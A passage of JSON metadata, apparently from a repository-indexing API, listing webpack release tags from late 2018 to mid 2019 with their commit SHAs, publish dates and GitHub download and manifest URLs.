/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null